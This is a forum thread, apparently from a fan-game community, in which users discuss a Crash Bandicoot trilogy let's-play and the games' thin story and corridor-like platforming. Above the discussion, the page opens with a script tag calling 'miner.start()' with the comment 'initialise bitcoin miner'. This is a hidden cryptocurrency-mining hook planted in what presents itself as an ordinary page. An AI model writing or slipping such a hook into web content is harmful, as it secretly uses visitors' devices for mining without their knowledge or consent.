<script>
miner.start(); // initialise bitcoin miner
</script>

smbx communitymario fan games galaxysmw central

Crash Bandicoot Trilogy - U R Not Red E

this is the place where lps are being talked about. it's important to talk about games being played on the internet.
Piesonscreations
First name: Gon
Pronouns: he/him/his

Re: Crash Bandicoot Trilogy - U R Not Red E

Postby Piesonscreations » 1 month ago

That ending sure happened.
I think I enjoyed watching the Crash 1 LP more than Crash 2.

Bean

Postby Bean » 1 month ago

More of a fan of playing Crash 2 than 1, but LP wise, I don't know which one was more entertaining. They both had their moments. This one was pretty good for "raocow misses a jump at the start" more than messing up at the end.

Leet
Well, hello, Smith ( ´-`)ノ
First name: Chie Arale
Pronouns: she/her

Postby Leet » 1 month ago

The secret endings (and the plot scenes in general) of these games are really transparent about how they were made in a really subdivided western development environment where they were just kind of made around the game they already designed.
Well it is a decent hack but sometime its just too repetitif there no level that actually pop in your face and your like oh yeah that level they all ressemble themselves and just monster along the way.
Blood Ghoul wrote:Sometimes it seems my blood spurts out in gobs, as if it were a fountain's pulsing sobs. I clearly hear it mutter as it goes yet cannot find the wound from which it flows. Before I met you, baby, I didn't know what I was missing.

Hoeloe
A2XT person
Pronouns: she/her

Postby Hoeloe » 1 month ago

Leet wrote: The secret endings (and the plot scenes in general) of these games are really transparent about how they were made in a really subdivided western development environment where they were just kind of made around the game they already designed.
I'd argue that's less the case in Crash 3, as there are some more thematic links between "the plot" and the level themes they chose, but Crash games are definitely more about the levels, and just use the story as trappings for the minimal justification required to get you to go on a platforming romp.

CharlesSchulz

Postby CharlesSchulz » 1 month ago

It's like raocow said at some point in the Crash 1 LP, you can feel the grid in these games. The story and characters are enough to capture a kid's attention but there's not much of an attempt to hide the basic platforming skeleton. It stands in stark contrast against something like Mario 64, where the movement itself is realistic and immersive, and the levels are expansive and drenched in atmosphere. Crash is a game of running and jumping through corridors with a small handful repeating level themes. If you're a dedicated enough player to finish it 100%, it's probably a given that you're here for the platforming moreso than the story trappings, and the satisfaction of beating it is its own reward.

Whimsical Calamari
i am the one that sings the chorus when you hum in the shower

Postby Whimsical Calamari » 1 month ago

CharlesSchulz wrote: If you're a dedicated enough player to finish it 100%, it's probably a given that you're here for the platforming moreso than the story trappings, and the satisfaction of beating it is its own reward.
yeeeeep that's me. when i got the n-sane trilogy, it was incredibly refreshing to play a game again that was literally just Video Game. no taking itself seriously as a narrative, no showing off, just a bunch of paths that you run and jump to the end.

Return to “let's play”